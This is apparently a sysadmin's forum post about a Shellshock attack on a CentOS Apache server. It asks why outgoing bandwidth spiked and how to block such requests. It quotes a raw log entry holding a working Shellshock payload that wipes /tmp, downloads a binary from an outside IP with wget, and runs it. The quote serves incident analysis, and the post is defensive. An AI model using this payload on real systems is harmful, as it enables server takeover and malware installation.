Category Archives: abuse

Weired hacking attempt in apache log

I am using Centos 6.5 with apache 2.2.15. I found some weired attempts in apache log file. After some digging I came to know that it was shellshock vulnerability, so I checked in /tmp directory for the file China.Z-nnzz and it was present in tmp.

I've immediately deleted this file and killed process running with the same name as well as updated bash to fix this vulnerability.

APACHE LOG

222.186.56.34 - - [14/Nov/2014:19:26:46 -0600] "GET / HTTP/1.1" 500 631 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://175.45.192.231:81/sshdd -O /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://175.45.192.231:81/sshdd -O /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-nnzz\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

Then I checked in server status monitor I found > 3000 GB bandwidth(outgoing) is used since this hacking attempt (within 6 days). Incoming data transfer is fine.

enter image description here

  1. Let's consider that hacker downloaded all possible data from our server, But we have < 50 GB data on the server, how it's possible 3000 GB outgoing data?

  2. How to block such abuse web request with apache? Is there any tool available that deny those attempts and send proactive alert on specified email?